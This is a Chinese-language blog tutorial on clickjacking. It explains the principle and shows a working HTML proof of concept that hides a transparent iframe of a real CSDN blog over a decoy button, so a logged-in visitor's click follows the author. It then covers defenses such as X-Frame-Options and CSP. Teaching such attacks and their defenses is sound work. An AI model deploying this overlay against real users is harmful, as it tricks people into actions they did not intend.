网络安全-点击劫持(ClickJacking)的原理、攻击及防御

简介: 网络安全-点击劫持(ClickJacking)的原理、攻击及防御

简介

2008年,安全专家Robert Hansen 与Jeremiah Grossman发现了一种被他们称为点击劫持(ClickJacking)的攻击。他们准备在OWASP安全大会上公布并进行演示,但是由于很多平台都中了招,包括Adobe在内的厂商要求在漏洞修补前不要公开此问题。

原理

点击劫持是视觉欺骗,用户只看到了底层页面,与页面进行交互时却是与上层页面在交互。这是由于透明的iframe造成的,通过控制iframe的位置,导致上层页面的按钮等覆盖到下层上。

2020062310470442.png

                                点击劫持,原理示意图

注:红色按钮(上层页面中的)应该是完全覆盖在黄色按钮(底层页面中的),由于看的不是很清楚,我稍微错位了一下。

攻击

<html>
<head>
<title>
来和鹿鸣Lumi互动吧!!!
</title>
<head>
<style>
iframe {
  width: 1440px;
  height: 900px;
  position: absolute;
  top: 30px;
  left: 450px;
  z-index: 2;
  -moz-opacity: 0;
  opacity: 0;
  filter: alpha(opacity=0);
}
</style>
</head>
</head>
<body>
<center>
<div>
<img src="https://ss1.bdstatic.com/70cFvXSh_Q1YnxGkpoWK1HF6hhy/it/u=1242777858,3501957407&fm=11&gp=0.jpg" height="60%">
<br>
<button>点击进行互动</button>
</div>
</center>
<iframe src="https://blog.csdn.net/lady_killer9" scrolling="no"></iframe>
</body>
</html>

opacity为0.5,即上层页面为半透明状态。

image.png

                                                    opacity为0.5时

可以看到关注按钮覆盖在了下方的点击进行互动按钮上。

2020062310470442.png

                                              opacity为0时

此时,上层页面完全无法看见,这时如果你登录csdn后点击"点击进行互动"按钮,就会关注我。

防御

frame busting

js编写的,防御效果不好,可绕过。

X-Frame-Options

部分浏览器支持

DENY:禁止iframe,浏览器拒绝当前页面加载任何iframe页面。

SAMEORIGIN:只允许相同域名下的网页iframe,同源政策保护。

ALLOW-FROM: 白名单限制。

Content Security Policy

"网页安全政策"(Content Security Policy,缩写 CSP),一种白名单制度。

NoScript扩展

2020062310470442.png


                                        火狐官方回答

拓展

除了这种点击劫持,还有拖拽劫持,手机端触屏劫持,原理都一样。

参考

《白帽子讲Web安全》

更多内容查看:网络安全-自学笔记

喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

相关文章
|
7天前
|
存储 安全 网络协议
网络安全的盾牌与剑:漏洞防御与加密技术
【9月更文挑战第10天】在数字时代的浪潮中,网络安全成为守护信息资产的盾牌与剑。本文将探讨网络安全的两个核心议题:网络漏洞的防御策略和加密技术的应用。通过深入浅出的分析,我们将了解如何识别和防范安全威胁,以及如何利用加密技术保护数据安全。文章旨在提升公众的安全意识,为打造更安全的网络环境提供实践指南。
30 11
|
8天前
|
SQL 监控 安全
数字堡垒之下:网络安全的现代挑战与防御策略
在这个数字信息日益增长的时代,网络安全已成为保护个人隐私和企业资产的关键战场。本文将深入探讨网络安全中常见的漏洞、先进的加密技术以及提升安全意识的重要性。通过分析最新的网络攻击案例和防御措施,我们旨在为读者提供一套实用的网络安全知识框架,帮助大众构建更为坚固的数字防线。
24 7
|
8天前
|
机器学习/深度学习 人工智能 自然语言处理
深度剖析深度神经网络(DNN):原理、实现与应用
本文详细介绍了深度神经网络(DNN)的基本原理、核心算法及其具体操作步骤。DNN作为一种重要的人工智能工具,通过多层次的特征学习和权重调节,实现了复杂任务的高效解决。文章通过理论讲解与代码演示相结合的方式,帮助读者理解DNN的工作机制及实际应用。
|
4天前
|
网络协议 Linux 应用服务中间件
Socket通信之网络协议基本原理
【9月更文挑战第14天】网络协议是机器间交流的约定格式,确保信息准确传达。主要模型有OSI七层与TCP/IP模型,通过分层简化复杂网络环境。IP地址全局定位设备,MAC地址则在本地网络中定位。网络分层后,数据包层层封装,经由不同层次协议处理,最终通过Socket系统调用在应用层解析和响应。
|
5天前
|
云安全 缓存 网络协议
如何防护DDoS攻击,筑牢网络安全防线
随着信息技术的飞速发展,网络已成为现代社会不可或缺的一部分,极大地便利了个人社交和商业活动。然而,网络空间在创造无限机遇的同时,也潜藏着诸多威胁,其中分布式拒绝服务攻击(DDoS,Distributed Denial of Service)以其高破坏力和难以防范的特点,成为网络安全领域的一大挑战。本文将从DDoS攻击的原理出发,详细探讨如何有效防护DDoS攻击,以筑牢网络安全防线。
|
5天前
|
SQL 安全 网络安全
网络安全的盾牌与矛:漏洞防御与加密技术
【9月更文挑战第12天】在数字时代的浪潮中,网络安全成为保护信息资产不可或缺的防线。本文深入探讨了网络安全的核心问题——安全漏洞及其防范措施,同时对加密技术进行了详细解读,旨在提高公众的安全意识,并分享实用的防护策略。从基础概念到实际操作,我们一步步揭示如何在日益复杂的网络环境中保护自己的数据不受威胁。
|
5天前
|
网络协议 网络架构 数据格式
TCP/IP基础:工作原理、协议栈与网络层
TCP/IP(传输控制协议/互联网协议)是互联网通信的基础协议,支持数据传输和网络连接。本文详细阐述了其工作原理、协议栈构成及网络层功能。TCP/IP采用客户端/服务器模型,通过四个层次——应用层、传输层、网络层和数据链路层,确保数据可靠传输。网络层负责IP寻址、路由选择、分片重组及数据包传输,是TCP/IP的核心部分。理解TCP/IP有助于深入掌握互联网底层机制。
25 2
|
1天前
|
安全 网络安全 数据安全/隐私保护
网络安全的护城河:漏洞防御与加密技术解析
【9月更文挑战第16天】在数字信息的海洋中,网络安全是守护数据宝库的坚固城墙。本文将深入探讨网络安全中的漏洞防御和加密技术,揭示安全意识的重要性,并提供实用的代码示例,帮助读者构建起一道道防护墙,确保信息安全的堡垒坚不可摧。
|
3天前
|
SQL 安全 网络安全
网络安全与信息安全:构建防线的三大支柱在数字时代,网络安全和信息安全成为了我们不可忽视的重要议题。本文将深入探讨网络安全漏洞、加密技术以及安全意识这三大支柱,帮助您建立更全面的安全防护体系。
本文旨在分享有关网络安全漏洞、加密技术和安全意识的知识。首先,我们将介绍常见的网络安全漏洞及其形成原因;接着,我们将探讨几种主要的加密技术及其应用;最后,我们将强调提高安全意识的重要性并提供实用的建议。通过这些内容,读者可以更好地理解如何在日常生活和工作中保护自己的信息安全。
23 9
|
2天前
|
存储 SQL 安全
网络安全与信息安全:关于网络安全漏洞、加密技术、安全意识等方面的知识分享
【9月更文挑战第15天】在数字化时代,网络安全与信息安全已成为我们日常生活中不可或缺的一部分。本文将介绍网络安全漏洞、加密技术和安全意识等方面的知识,以帮助读者更好地了解和应对网络安全挑战。通过深入浅出的方式,我们将探讨如何保护个人信息和数据安全,以及如何提高自己的网络安全意识。